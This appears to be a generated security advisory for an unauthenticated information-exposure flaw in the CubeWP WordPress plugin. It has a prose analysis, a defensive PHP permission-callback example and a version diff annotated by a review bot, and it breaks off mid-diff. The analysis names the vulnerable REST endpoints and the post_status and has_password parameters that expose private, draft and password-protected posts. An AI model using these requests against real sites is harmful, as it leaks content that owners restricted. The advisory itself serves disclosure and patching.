Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-12129: CubeWP – All-in-One Dynamic Content Framework <= 1.1.27 – Unauthenticated Information Exposure (cubewp-framework)

Severity: Medium (CVSS 5.3)
CWE: CWE-200
Vulnerable Version: 1.1.27
Patched Version: 1.1.28
Disclosed: January 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12129:
This vulnerability is an unauthenticated information exposure flaw in the CubeWP WordPress plugin’s REST API endpoints. It allows attackers to bypass WordPress’s standard post status and visibility controls, extracting data from password-protected, private, and draft posts. The severity is medium (CVSS 5.3), affecting all plugin versions up to and including 1.1.27.

The root cause lies in insufficient access control within the plugin’s custom REST API endpoints. The vulnerable code resides in the `cubewp-framework/cube/modules/cubewp-posts/class-cubewp-posts-rest-api.php` file, specifically in the `cubewp_rest_query_new` and `cubewp_rest_query` functions. These functions handle requests to the `/cubewp-posts/v1/query-new` and `/cubewp-posts/v1/query` endpoints. The functions accept user-supplied parameters, construct a `WP_Query`, and return results without applying proper authorization checks. The query parameters are passed directly to `WP_Query` without validating the user’s right to view posts with specific statuses or password protection.

Exploitation involves sending unauthenticated HTTP POST requests to the vulnerable REST endpoints. Attackers can craft requests with parameters that instruct `WP_Query` to return posts regardless of their status. A typical payload would include parameters like `post_status` set to `['publish', 'private', 'draft', 'password']` and `has_password` set to `null` or `false` to bypass password protection. The attacker can also specify `posts_per_page` to extract large volumes of data. The endpoints do not require authentication or a valid nonce, making them accessible to any visitor.

The patch, implemented in version 1.1.28, modifies the `cubewp_rest_query_new` and `cubewp_rest_query` functions. The fix adds a call to `cubewp_rest_validate_user_access` before processing the query. This validation function checks the user’s capabilities against the requested post type and status. If the user lacks appropriate permissions (e.g., cannot read private posts), the function returns a `WP_Error` object, blocking the request. The patch ensures the plugin respects WordPress’s core permission system for post visibility.
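A permission callback of the kind the fix describes, as an added example that is not the plugin's code (the actual `cubewp_rest_validate_user_access` is not reproduced on this page); the route name, parameter names, and the cap of 100 posts per request are assumptions, and the capability model follows WordPress core rather than anything plugin-specific:

```php
<?php
// Added example, not CubeWP code. Route, parameter names and the cap of 100
// posts per request are assumptions. Capability model follows WordPress core:
// 'publish' is public, 'private' needs read_private_posts, anything else
// (draft, pending, future, 'any') needs edit_posts on that post type.

function cubewp_demo_rest_query_permission( WP_REST_Request $request ) {
    $post_type = sanitize_key( $request->get_param( 'post_type' ) ?: 'post' );
    $pto       = get_post_type_object( $post_type );
    if ( ! $pto ) {
        return new WP_Error( 'rest_invalid_post_type', 'Unknown post type.', array( 'status' => 400 ) );
    }

    // Normalise post_status to an array; anonymous callers default to 'publish'.
    $statuses = (array) ( $request->get_param( 'post_status' ) ?: array( 'publish' ) );
    foreach ( $statuses as $status ) {
        $status = sanitize_key( $status );
        if ( 'publish' === $status ) {
            continue;
        }
        if ( 'private' === $status && current_user_can( $pto->cap->read_private_posts ) ) {
            continue;
        }
        if ( current_user_can( $pto->cap->edit_posts ) ) {
            continue;
        }
        return new WP_Error(
            'rest_forbidden_status',
            sprintf( 'post_status "%s" is not viewable by the current user.', $status ),
            array( 'status' => rest_authorization_required_code() )
        );
    }

    // A caller-supplied has_password (null/false) is exactly the bypass described
    // above; only users who may edit the post type get to choose it.
    if ( $request->has_param( 'has_password' ) && ! current_user_can( $pto->cap->edit_posts ) ) {
        return new WP_Error(
            'rest_forbidden_param',
            'has_password cannot be set by this user.',
            array( 'status' => rest_authorization_required_code() )
        );
    }
    return true;
}

function cubewp_demo_rest_query_handler( WP_REST_Request $request ) {
    $post_type = sanitize_key( $request->get_param( 'post_type' ) ?: 'post' );
    $pto       = get_post_type_object( $post_type );

    // Allow-list the WP_Query arguments instead of forwarding the request body.
    $args = array(
        'post_type'      => $post_type,
        'post_status'    => array_map( 'sanitize_key', (array) ( $request->get_param( 'post_status' ) ?: array( 'publish' ) ) ),
        'posts_per_page' => min( 100, max( 1, (int) ( $request->get_param( 'posts_per_page' ) ?: 10 ) ) ),
        // Derived from capability, never from the request: exclude password-protected
        // posts unless the caller may edit the type.
        'has_password'   => current_user_can( $pto->cap->edit_posts ) ? null : false,
    );

    $out = array();
    foreach ( ( new WP_Query( $args ) )->posts as $post ) {
        $out[] = array(
            'id'     => $post->ID,
            'title'  => get_the_title( $post ),
            'status' => $post->post_status,
        );
    }
    return rest_ensure_response( $out );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'cubewp-demo/v1', '/query', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'permission_callback' => 'cubewp_demo_rest_query_permission',
        'callback'            => 'cubewp_demo_rest_query_handler',
    ) );
} );
```

With this in place an anonymous POST carrying `post_status: ["private","draft"]` is answered with a 401 `WP_Error` before `WP_Query` ever runs, and even a permitted caller cannot widen the result set beyond the allow-listed arguments.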

The impact is unauthorized disclosure of sensitive content. Attackers can extract the full content, titles, metadata, and custom field data from posts intended only for specific users or administrators. This exposure can lead to information leakage, privacy violations, and potential business intelligence gathering. The vulnerability does not allow modification or deletion of posts, but the exposed data could be used in further attacks or social engineering.

Differential between vulnerable and patched code

Code Diff
--- a/cubewp-framework/cube.php
+++ b/cubewp-framework/cube.php
@@ -3,14 +3,15 @@
 * Plugin Name: CubeWP Framework
 * Plugin URI: https://cubewp.com/
 * Description: CubeWP is an end-to-end dynamic content framework for WordPress to help you save up to 90% of your coding time.
-* Version: 1.1.27
+* Version: 1.1.28
 * Author: CubeWP
 * Author URI: https://cubewp.com
 * Text Domain: cubewp-framework
 * Domain Path: /languages/
+* License: GPLv2 or later
 * @package Cubewp
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
-
+// phpcs:disable WordPress.NamingConventions.PrefixAllGlobals
 // Exit if accessed directly.
 if ( !defined( 'ABSPATH' ) )
 exit;
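Review bot: the new `// phpcs:disable WordPress.NamingConventions.PrefixAllGlobals` at the top of cube.php has no matching `phpcs:enable`, so the sniff is silenced for the whole file; scope it to the offending lines or re-enable after them. The unbraced `if ( !defined( 'ABSPATH' ) ) exit;` in the context lines also differs from the braced form used in the other files this patch touches.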
--- a/cubewp-framework/cube/classes/class-cubewp-add-ons.php
+++ b/cubewp-framework/cube/classes/class-cubewp-add-ons.php
@@ -55,23 +55,28 @@
 		$wp_version = $GLOBALS['wp_version'];

 		if (version_compare($wp_version, '5.8', '<'))
-			$message[] = __('This CubeWP Add-on requires WordPress 4.0 or higher. Version detected:', 'cubewp-frontend') . ' ' . $wp_version;
+			$message[] = __('This CubeWP Add-on requires WordPress 4.0 or higher. Version detected:', 'cubewp-framework') . ' ' . $wp_version;

 		// PHP check
 		$php_version = phpversion();
 		if (version_compare($php_version, '5.3', '<'))
-			$message[] = __('This CubeWP Add-on requires PHP 5.3 or higher. Version detected: ', 'cubewp-frontend') . ' ' . $php_version;
+			$message[] = __('This CubeWP Add-on requires PHP 5.3 or higher. Version detected: ', 'cubewp-framework') . ' ' . $php_version;

 		// SQL check
 		$sql_version = $wpdb->db_version();
 		if (version_compare($sql_version, '5.0', '<'))
-			$message[] = __('This CubeWP Add-on requires SQL 5.0 or higher. Version detected: ', 'cubewp-frontend') . ' ' . $sql_version;
+			$message[] = __('This CubeWP Add-on requires SQL 5.0 or higher. Version detected: ', 'cubewp-framework') . ' ' . $sql_version;

 		// Not empty $message means there are issues
 		if (! empty($message)) {

 			$error_message = implode("n", $message);
-			die(__('Sorry but your WordPress installation does not reach the minimum requirements for running this add-on. The following errors were given:', 'cubewp-frontend') . "n" . $error_message);
+			wp_die(
+				esc_html__(
+					'Sorry but your WordPress installation does not reach the minimum requirements for running this add-on. The following errors were given:',
+					'cubewp-framework'
+				) . "n" . esc_html( $error_message )
+			);
 		}

 		return $this->add_on_management($plugin);
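Review bot: the message and the check disagree: `version_compare($wp_version, '5.8', '<')` rejects anything below 5.8 while the string still reads 'requires WordPress 4.0 or higher'. Separately, `implode("n", $message)` and the `"n"` glued in front of `$error_message` join lines with a literal n rather than a newline, and since wp_die() renders HTML, a `<br>` (or a wp_kses allow-list instead of esc_html) is what would actually produce line breaks. The text-domain correction to 'cubewp-framework' and the move from die() to wp_die( esc_html() ) are right.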
@@ -113,7 +118,7 @@
 						// If plugin is free
 						if ($license_type == 'free') {
 							CWP()->update_cubewp_options($slug . '_key', $key);
-							unlink($file);
+							wp_delete_file($file);
 							return;
 						}

@@ -129,31 +134,31 @@
 						$response = wp_remote_post($this->route, array('timeout' => 15, 'sslverify' => false, 'body' => $api_params));
 						// make sure the response came back okay
 						if (is_wp_error($response)) {
-							die($file_is_not_valid);
+							wp_die( esc_html( $file_is_not_valid ) );
 						}
 						// decode the license data
 						$response_data = json_decode(wp_remote_retrieve_body($response));

 						if (isset($response_data->license)) {
 							if ('valid' != $response_data->license) {
-								die($lic_is_not_valid);
+								wp_die( esc_html( $lic_is_not_valid ) );
 							} else {
 								CWP()->update_cubewp_options($slug, $response_data);
 								CWP()->update_cubewp_options($slug . '_key', $key);
 								CWP()->update_cubewp_options($slug . '-status', $response_data->license);
 							}
 						} else {
-							die($lic_is_not_valid);
+							wp_die( esc_html( $lic_is_not_valid ) );
 						}
-						unlink($file);
+						wp_delete_file($file);
 					} else {
 						//file not good
-						die($need_fresh_file);
+						wp_die( esc_html( $need_fresh_file ) );
 					}
 				}
 			} else {
 				//Plugin not good
-				die($not_our_plugin);
+				wp_die( esc_html( $not_our_plugin ) );
 			}
 		}
 	}
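Review bot: the context line `wp_remote_post($this->route, array('timeout' => 15, 'sslverify' => false, 'body' => $api_params))` still disables certificate verification for the license check, so the `{"license":"valid"}` reply the code trusts can be supplied by anyone on the network path; this patch only wraps the failure branches in wp_die( esc_html() ) and leaves that weakness in place. Drop `'sslverify' => false`. Also, `wp_delete_file($file)` in this and the preceding hunk discards its return value, so a key file that could not be removed stays on disk silently.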
@@ -310,7 +315,7 @@
 					if (file_exists($file)) {
 						$key = file_get_contents($file);
 						CWP()->update_cubewp_options($slug . '_key', $key);
-						unlink($file);
+						wp_delete_file($file);
 						return;
 					} else {
 						$key = isset($add_ons[$plugin]['key']) ? $add_ons[$plugin]['key'] : '';
--- a/cubewp-framework/cube/classes/class-cubewp-admin-enqueue.php
+++ b/cubewp-framework/cube/classes/class-cubewp-admin-enqueue.php
@@ -1,4 +1,5 @@
 <?php
+
 /**
  * CubeWp Admin Enqueue.
  *
@@ -6,12 +7,13 @@
  * @version 1.0
  */

+ // phpcs:disable WordPress.NamingConventions.PrefixAllGlobals
+
 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
 }


-
 /**
  * CubeWp_Admin_Enqueue
  */
@@ -42,7 +44,7 @@
 	/**
 	 * Method get_registered_types_types
 	 *
-	 * @return void
+	 * @return array
 	 * * @since  1.0.0
 	 */
 	private static function get_registered_types_types() {
@@ -79,7 +81,6 @@
 			}

 			wp_reset_postdata();
-			wp_reset_query();
 		}

 		return $group_fields_values;
@@ -88,7 +89,7 @@
 	/**
 	 * Method get_cf_types_types
 	 *
-	 * @return void
+	 * @return array
 	 * * @since  1.0.0
 	 */
 	private static function get_cf_types_types() {
@@ -101,7 +102,7 @@
     /**
      * Method get_registered_taxonomies
      *
-     * @return void
+     * @return array
 	 * * @since  1.0.0
      */
     private static function get_registered_taxonomies() {
@@ -461,7 +462,10 @@



-        echo apply_filters( 'admin/script/enqueue', '');
+        $cubewp_admin_inline_output = apply_filters( 'admin/script/enqueue', '' );
+        if ( ! empty( $cubewp_admin_inline_output ) ) {
+            echo wp_kses_post( $cubewp_admin_inline_output );
+        }

 	}
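Review bot: running the 'admin/script/enqueue' filter output through wp_kses_post() is safer than the raw echo it replaces, but wp_kses_post() strips `<script>` and `<style>` elements, so any add-on that uses this filter to inject inline script (as the filter name implies) is now silently broken. Either document that only post-safe markup is accepted here or route script through wp_add_inline_script(). The same construction is applied to 'frontend/script/enqueue' in class-cubewp-enqueue.php.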

--- a/cubewp-framework/cube/classes/class-cubewp-admin-notice.php
+++ b/cubewp-framework/cube/classes/class-cubewp-admin-notice.php
@@ -79,7 +79,7 @@
 		$notice_ui .= '<p>' . cubewp_core_data( $this->message ) . '</p>';
 		$notice_ui .= '</div>';

-		print( $notice_ui );
+		echo wp_kses_post( $notice_ui );
 	}

 	/**
@@ -175,14 +175,16 @@
 	 * @since  1.0.0
 	 */
 	private static function cubewp_remove_notices_permanently() {
+		/* phpcs:ignore WordPress.Security.NonceVerification.Recommended, WordPress.Security.NonceVerification.Missing */
 		if ( isset( $_GET['cubewp-remove-notice-permanently'] ) && ! empty( $_GET['cubewp-remove-notice-permanently'] ) ) {
 		   $permanently_removed_notices = get_option( 'permanently_removed_notices' );
 		   $permanently_removed_notices = ! empty( $permanently_removed_notices ) && is_array( $permanently_removed_notices ) ? $permanently_removed_notices : array();
-		   $permanently_removed_notices[] = sanitize_text_field( $_GET['cubewp-remove-notice-permanently'] );
+		   /* phpcs:ignore WordPress.Security.NonceVerification.Recommended */
+		   $permanently_removed_notices[] = sanitize_text_field( wp_unslash($_GET['cubewp-remove-notice-permanently'] ));
 		   update_option( 'permanently_removed_notices', $permanently_removed_notices );
 		   $current_url = cubewp_get_current_url();
 		   $current_url = remove_query_arg( 'cubewp-remove-notice-permanently', $current_url );
-		   wp_redirect( esc_url( $current_url ) );
+		   wp_safe_redirect( $current_url );
 		   exit;
 		}
 	}
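Review bot: cubewp_remove_notices_permanently() still performs a state change (update_option) in response to a bare GET parameter with neither a nonce nor a capability check; the hunk papers over this with two phpcs:ignore comments instead of fixing it. Gate the block on `current_user_can( 'manage_options' )` and `check_admin_referer( 'cubewp-remove-notice' )` with the nonce added to the dismiss link. The wp_unslash() before sanitize_text_field() and the switch to wp_safe_redirect() are correct.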
@@ -201,13 +203,24 @@
 			'wordpress' => [
 				'version' => CubeWp_Load::$wp_req_version,
 				'i18n'    => [
-					'requirements' => sprintf( __( 'CubeWP requires WordPress version %1$s or higher. You are using version %2$s. Please upgrade WordPress to use CubeWP.', 'cubewp-framework' ), CubeWp_Load::$wp_req_version, $GLOBALS['wp_version'] ),
+					'requirements' => sprintf(
+						/* translators: 1: Required WordPress version, 2: Current WordPress version */
+						__( 'CubeWP requires WordPress version %1$s or higher. You are using version %2$s. Please upgrade WordPress to use CubeWP.', 'cubewp-framework' ),
+						CubeWp_Load::$wp_req_version,
+						$GLOBALS['wp_version']
+					),
 				],
 			],
-			'php'       => [
+			'php' => [
 				'version' => CubeWp_Load::$php_req_version,
 				'i18n'    => [
-					'requirements' => sprintf( __( 'CubeWP requires PHP version %1$s or higher. You are using version %2$s. Please <a href="%3$s">upgrade PHP</a> to use CubeWP.', 'cubewp-framework' ), CubeWp_Load::$php_req_version, PHP_VERSION, 'https://wordpress.org/support/upgrade-php/' ),
+					'requirements' => sprintf(
+						/* translators: 1: Required PHP version, 2: Current PHP version, 3: URL to upgrade PHP */
+						__( 'CubeWP requires PHP version %1$s or higher. You are using version %2$s. Please <a href="%3$s">upgrade PHP</a> to use CubeWP.', 'cubewp-framework' ),
+						CubeWp_Load::$php_req_version,
+						PHP_VERSION,
+						'https://wordpress.org/support/upgrade-php/'
+					),
 				],
 			],
 		];
--- a/cubewp-framework/cube/classes/class-cubewp-admin.php
+++ b/cubewp-framework/cube/classes/class-cubewp-admin.php
@@ -98,13 +98,17 @@
      */
     public static function cubewp_get_builder_widgets() {

-        if ( ! wp_verify_nonce($_POST['security_nonce'], "cubewp-admin-nonce")) {
+        if ( empty( $_POST['security_nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['security_nonce'] ) ), 'cubewp-admin-nonce' ) ) {
 			wp_send_json_error(array(
 				'msg' => esc_html__('Sorry! Security Verification Failed.', 'cubewp-framework'),
 			), 404);
 		}
-
-        $widgets_ui = self::cubewp_builder_widgets_display($_POST['nested_switcher'],$_POST['form_type'],$_POST['slug']);
+
+		$nested_switcher = isset( $_POST['nested_switcher'] ) ? sanitize_text_field( wp_unslash( $_POST['nested_switcher'] ) ) : '';
+		$form_type       = isset( $_POST['form_type'] ) ? sanitize_text_field( wp_unslash( $_POST['form_type'] ) ) : '';
+		$slug            = isset( $_POST['slug'] ) ? sanitize_key( wp_unslash( $_POST['slug'] ) ) : '';
+
+		$widgets_ui = self::cubewp_builder_widgets_display( $nested_switcher, $form_type, $slug );
 		wp_send_json_success(array( 'sidebar' => $widgets_ui));
 	}
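Review bot: the nonce check now tolerates a missing field, but there is still no capability check, so any authenticated user who can obtain the 'cubewp-admin-nonce' value can invoke this AJAX handler; add a `current_user_can( 'manage_options' )` (or the relevant builder capability) test beside the nonce check. The 404 returned on a failed security verification should be 403. The per-field isset()/sanitize_text_field()/sanitize_key() handling of $_POST is a clear improvement over passing the raw superglobals into cubewp_builder_widgets_display().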

@@ -117,14 +121,15 @@
      * @since  1.0.0
      */
     public static function cubewp_process_post_card_css() {
-        if ( ! wp_verify_nonce($_POST['security_nonce'], "cubewp-admin-nonce")) {
+        if ( empty( $_POST['security_nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['security_nonce'] ) ), 'cubewp-admin-nonce' ) ) {
 			wp_send_json_error(array(
 				'msg' => esc_html__('Sorry! Security Verification Failed.', 'cubewp-framework'),
 			), 404);
 		}
-        if (isset($_POST['styles']) && is_string($_POST['styles'])) {
-
-            $data = json_decode(stripslashes($_POST['styles']), true);
+        if ( isset( $_POST['styles'] ) ) {
+            /*phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized */
+            $raw_styles = wp_unslash( $_POST['styles'] );
+            $data = is_string( $raw_styles ) ? json_decode( $raw_styles, true ) : null;
             if (is_array($data)) {
                 $cleaned_data = array_map(function($item) {
                     // Remove surrounding quotes
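Review bot: same gap as in cubewp_get_builder_widgets(): this handler ends up writing a CSS file to disk on a nonce alone, with no capability check. The phpcs:ignore on `$raw_styles = wp_unslash( $_POST['styles'] )` is only justified because the decoded items are sanitized later in the array_map callback; that dependency belongs in the comment. Moving `is_string()` into the ternary is fine, but a non-string value now silently yields null rather than an error response.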
@@ -133,6 +138,8 @@
                     $item = str_replace('n', "n", $item);
                     // Replace plus signs with spaces
                     $item = str_replace('+', ' ', $item);
+                    // Sanitize each line as textarea content to avoid unsafe content
+                    $item = sanitize_textarea_field( $item );
                     return $item;
                 }, $data);
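Review bot: `str_replace('n', "n", $item)` as shown replaces n with n, a no-op; if the intent is to convert an escaped backslash-n sequence into a real newline, the first argument needs the backslash. The added sanitize_textarea_field() strips anything resembling a tag and encodes stray `<` characters, which is a reasonable guard for CSS text but will alter any rule that legitimately contains `<`; note it as a deliberate restriction.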

@@ -144,8 +151,8 @@
                 }
                 $file_path = CUBEWP_POST_CARDS_DIR . '/cubewp-post-cards.css';

-                if (!file_exists(dirname($file_path))) {
-                    mkdir(dirname($file_path), 0755, true);
+                if ( ! file_exists( dirname( $file_path ) ) ) {
+                    wp_mkdir_p( dirname( $file_path ) );
                 }

                 if (file_put_contents($file_path, $css_code) !== false) {
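Review bot: wp_mkdir_p() is the right replacement for mkdir(), but the write itself still uses file_put_contents() at a fixed path under CUBEWP_POST_CARDS_DIR; use the WP_Filesystem API for consistency with the rest of the patch, and make sure the capability gate raised on the previous hunk is in place before user-controlled text reaches the filesystem. Checking the file_put_contents() return value is good.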
@@ -216,20 +223,20 @@
             return null;
         }
         $modules = array(
-            'custom-fields' => 'modules/',
-            'theme-builder'  => 'modules/',
-            'post-types' => 'modules/',
-            'users'      => 'modules/',
-            'search'     => 'modules/',
-            'settings'   => 'modules/',
-            'taxonomies' => 'modules/',
-            'list-tables'=> 'modules/',
-            'elementor'  => 'modules/',
-            'recaptcha'  => 'modules/',
-            'builder'  => 'modules/',
-
-            'widgets'    => 'includes/',
-            'shortcodes' => 'includes/',
+            'custom-fields'     => 'modules/',
+            'theme-builder'     => 'modules/',
+            'post-types'        => 'modules/',
+            'users'             => 'modules/',
+            'search'            => 'modules/',
+            'settings'          => 'modules/',
+            'taxonomies'        => 'modules/',
+            'list-tables'       => 'modules/',
+            'elementor'         => 'modules/',
+            'elementor/taxonomy'=> 'modules/',
+            'recaptcha'         => 'modules/',
+            'builder'           => 'modules/',
+            'widgets'           => 'includes/',
+            'shortcodes'        => 'includes/',
         );
         foreach($modules as $module=>$path){
             $file_name = $path.$module.'/class-' .str_replace('_', '-', strtolower($className)).'.php';
@@ -240,7 +247,6 @@
             }
         }

-
         return;
     }

@@ -315,12 +321,15 @@
         $single_tags = array(
             "title" => esc_html__("Post Title", "cubewp-framework"),
             "post_content" => esc_html__("Post Content", "cubewp-framework"),
+            "post_excerpt" => esc_html__("Post Excerpt", "cubewp-framework"),
             "featured_image" => esc_html__("Featured Image", "cubewp-framework"),
             "post_author" => esc_html__("Post Author", "cubewp-framework"),
             "post_info" => esc_html__("Post Info", "cubewp-framework"),
             "post_term" => esc_html__("Post Term", "cubewp-framework"),
             "post_share" => esc_html__("Post Share Button", "cubewp-framework"),
             "post_save" => esc_html__("Post Save Button", "cubewp-framework"),
+            "post_url" => esc_html__("Post URL", "cubewp-framework"),
+            "post_date" => esc_html__("Post Date", "cubewp-framework"),
             "custom_fields" => esc_html__("CubeWP Custom Fields", "cubewp-framework")
         );
         foreach ( $single_tags as $tag => $label ) {
@@ -329,31 +338,69 @@
                 $module->register( new $tag() );
             }
         }
+
+        $module->register_group( 'cubewp-taxonomy-fields', [
+            'title' => esc_html__( 'CubeWP Taxonomy Custom Fields', 'cubewp-framework' ),
+        ] );
+        $taxonomy_tags = array(
+            "term_name" => esc_html__("Term Name", "cubewp-framework"),
+            "term_url" => esc_html__("Term URL", "cubewp-framework"),
+            "term_count" => esc_html__("Term Count", "cubewp-framework"),
+            "term_description" => esc_html__("Term Description", "cubewp-framework"),
+            "taxonomy_text" => esc_html__("Field Type (Text)", "cubewp-framework"),
+            "taxonomy_textarea" => esc_html__("Field Type (Textarea)", "cubewp-framework"),
+            "taxonomy_image" => esc_html__("Field Type (Image)", "cubewp-framework"),
+            "taxonomy_color" => esc_html__("Field Type (Color)", "cubewp-framework"),
+            "taxonomy_url" => esc_html__("Field Type (URL)", "cubewp-framework"),
+            "taxonomy_gallery" => esc_html__("Field Type (Gallery)", "cubewp-framework"),
+            "taxonomy_oembed" => esc_html__("Field Type (oEembed)", "cubewp-framework"),
+            "taxonomy_google_address" => esc_html__("Field Type (Google Address)", "cubewp-framework"),
+        );
+        foreach ( $taxonomy_tags as $tag => $label ) {
+            $tag = 'CubeWp_Tag_'.ucfirst($tag);
+            if(class_exists($tag)){
+                $module->register( new $tag() );
+            }
+        }
     }

     public function cubewp_updated_post_type_messages( $messages ) {
+        /* phpcs:ignore WordPress.Security.NonceVerification.Recommended, WordPress.Security.NonceVerification.Missing */
         global $post, $post_ID;
         $post_types = get_post_types( array( 'show_ui' => true, '_builtin' => false ), 'objects' );
         foreach ( $post_types as $post_type => $post_object ) {
            $messages[ $post_type ] = array(
               0  => '', // Unused. Messages start at index 1.
-              1  => sprintf( __( '%s updated. <a href="%s">View %s</a>' ), $post_object->labels->singular_name, esc_url( get_permalink( $post_ID ) ), $post_object->labels->singular_name ),
-              2  => __( 'Custom field updated.' ),
-              3  => __( 'Custom field deleted.' ),
-              4  => sprintf( __( '%s updated.' ), $post_object->labels->singular_name ),
-              5  => isset( $_GET['revision'] ) ? sprintf( __( '%s restored to revision from %s' ), $post_object->labels->singular_name, wp_post_revision_title( (int) $_GET['revision'], false ) ) : false,
-              6  => sprintf( __( '%s published. <a href="%s">View %s</a>' ), $post_object->labels->singular_name, esc_url( get_permalink( $post_ID ) ), $post_object->labels->singular_name ),
-              7  => sprintf( __( '%s saved.' ), $post_object->labels->singular_name ),
-              8  => sprintf( __( '%s submitted. <a target="_blank" href="%s">Preview %s</a>' ), $post_object->labels->singular_name, esc_url( add_query_arg( 'preview', 'true', get_permalink( $post_ID ) ) ), $post_object->labels->singular_name ),
-              9  => sprintf( __( '%s scheduled for: <strong>%1$s</strong>. <a target="_blank" href="%2$s">Preview %s</a>' ), $post_object->labels->singular_name, date_i18n( __( 'M j, Y @ G:i' ), strtotime( $post->post_date ) ), esc_url( get_permalink( $post_ID ) ), $post_object->labels->singular_name ),
-              10 => sprintf( __( '%s draft updated. <a target="_blank" href="%s">Preview %s</a>' ), $post_object->labels->singular_name, esc_url( add_query_arg( 'preview', 'true', get_permalink( $post_ID ) ) ), $post_object->labels->singular_name ),
+              /* translators: 1: Post type singular name, 2: URL to view, 3: Post type singular name */
+              1  => sprintf( __( '%1$s updated. <a href="%2$s">View %3$s</a>', 'cubewp-framework' ), $post_object->labels->singular_name, esc_url( get_permalink( $post_ID ) ), $post_object->labels->singular_name ),
+              2  => __( 'Custom field updated.', 'cubewp-framework' ),
+              3  => __( 'Custom field deleted.', 'cubewp-framework' ),
+              /* translators: 1: Post type singular name */
+              4  => sprintf( __( '%1$s updated.', 'cubewp-framework' ), $post_object->labels->singular_name ),
+              /* translators: 1: Post type singular name, 2: Revision title*/
+              5  => isset( $_GET['revision'] ) ? sprintf( __( '%1$s restored to revision from %2$s', 'cubewp-framework' ), $post_object->labels->singular_name, wp_post_revision_title( (int) sanitize_text_field(wp_unslash($_GET['revision'])), false ) ) : false,/* phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only use of query vars to render notice; no state change performed. WordPress.Security.NonceVerification.Missing -- Back-compat: legacy admin form may not include a nonce. */
+              /* translators: 1: Post type singular name, 2: URL to view, 3: Post type singular name */
+              6  => sprintf( __( '%1$s published. <a href="%2$s">View %3$s</a>', 'cubewp-framework' ), $post_object->labels->singular_name, esc_url( get_permalink( $post_ID ) ), $post_object->labels->singular_name ),
+              /* translators: 1: Post type singular name */
+              7  => sprintf( __( '%1$s saved.', 'cubewp-framework' ), $post_object->labels->singular_name ),
+              /* translators: 1: Post type singular name, 2: URL to preview, 3: Post type singular name */
+              8  => sprintf( __( '%1$s submitted. <a target="_blank" href="%2$s">Preview %3$s</a>', 'cubewp-framework' ), $post_object->labels->singular_name, esc_url( add_query_arg( 'preview', 'true', get_permalink( $post_ID ) ) ), $post_object->labels->singular_name ),
+              /* translators: 1: Post type singular name, 2: Scheduled date, 3: URL to preview, 4: Post type singular name */
+              9  => sprintf( __( '%1$s scheduled for: <strong>%2$s</strong>. <a target="_blank" href="%3$s">Preview %4$s</a>', 'cubewp-framework' ), $post_object->labels->singular_name, date_i18n( __( 'M j, Y @ G:i', 'cubewp-framework' ), strtotime( $post->post_date ) ), esc_url( get_permalink( $post_ID ) ), $post_object->labels->singular_name ),
+              /* translators: 1: Post type singular name, 2: URL to preview, 3: Post type singular name */
+              10 => sprintf( __( '%1$s draft updated. <a target="_blank" href="%2$s">Preview %3$s</a>', 'cubewp-framework' ), $post_object->labels->singular_name, esc_url( add_query_arg( 'preview', 'true', get_permalink( $post_ID ) ) ), $post_object->labels->singular_name ),
            );
            if ($post_type == 'price_plan') {
-              $messages[ $post_type ][1] = sprintf( __( '%s updated.' ), $post_object->labels->singular_name );
-              $messages[ $post_type ][6] = sprintf( __( '%s published.' ), $post_object->labels->singular_name );
-              $messages[ $post_type ][8] = sprintf( __( '%s submitted.' ), $post_object->labels->singular_name );
-              $messages[ $post_type ][9] = sprintf( __( '%s scheduled for: <strong>%1$s</strong>.' ), $post_object->labels->singular_name, date_i18n( __( 'M j, Y @ G:i' ), strtotime( $post->post_date ) ) );
-              $messages[ $post_type ][10] = sprintf( __( '%s draft updated.' ), $post_object->labels->singular_name );
+              /* translators: 1: Post type singular name */
+              $messages[ $post_type ][1] = sprintf( __( '%1$s updated.', 'cubewp-framework' ), $post_object->labels->singular_name );
+              /* translators: 1: Post type singular name */
+              $messages[ $post_type ][6] = sprintf( __( '%1$s published.', 'cubewp-framework' ), $post_object->labels->singular_name );
+              /* translators: 1: Post type singular name */
+              $messages[ $post_type ][8] = sprintf( __( '%1$s submitted.', 'cubewp-framework' ), $post_object->labels->singular_name );
+              /* translators: 1: Post type singular name, 2: Scheduled date */
+              $messages[ $post_type ][9] = sprintf( __( '%1$s scheduled for: <strong>%2$s</strong>.', 'cubewp-framework' ), $post_object->labels->singular_name, date_i18n( __( 'M j, Y @ G:i', 'cubewp-framework' ), strtotime( $post->post_date ) ) );
+              /* translators: 1: Post type singular name */
+              $messages[ $post_type ][10] = sprintf( __( '%1$s draft updated.', 'cubewp-framework' ), $post_object->labels->singular_name );
            }
         }
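Review bot: three small points. (1) The phpcs:ignore at the top of cubewp_updated_post_type_messages() sits on the `global` line where it has no effect; the long trailing `/* phpcs:ignore ... */` on the message-5 line is the one that applies and makes that line hard to read, so move both into one comment above the `$_GET['revision']` use. (2) `(int) sanitize_text_field( wp_unslash( $_GET['revision'] ) )` is redundant: the integer cast alone is the sanitization for a revision ID. (3) 'Field Type (oEembed)' in the taxonomy tags array is a typo for 'oEmbed'. The added text domains and numbered placeholders with translator comments are correct.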

@@ -684,6 +731,7 @@
         register_post_status( 'inactive', array(
             'label'                     => _x( 'Inactive ', 'Inactive', 'cubewp-framework' ),
             'public'                    => true,
+            /* translators: %s: number of posts. */
             'label_count'               => _n_noop( 'Inactive s <span class="count">(%s)</span>', 'Inactive s <span class="count">(%s)</span>', 'cubewp-framework' ),
             'post_type'                 => array( 'cubewp-tb'),
             'show_in_admin_all_list'    => true,
--- a/cubewp-framework/cube/classes/class-cubewp-builder-pro.php
+++ b/cubewp-framework/cube/classes/class-cubewp-builder-pro.php
@@ -57,18 +57,18 @@
             $background_image_src = CWP_PLUGIN_URI.'cube/assets/admin/images/user-dashboard-screen.png';
         }
 		echo'<div id="cubewp-title-bar">
-		<h1>'.$page_header.'</h1>
+		<h1>'.esc_html($page_header).'</h1>
 		</div>
 		<div class="cubewp-subscription-frame">
-			<img class="cubewp-subscription-frame-bg" src="'.$background_image_src.'" alt="">
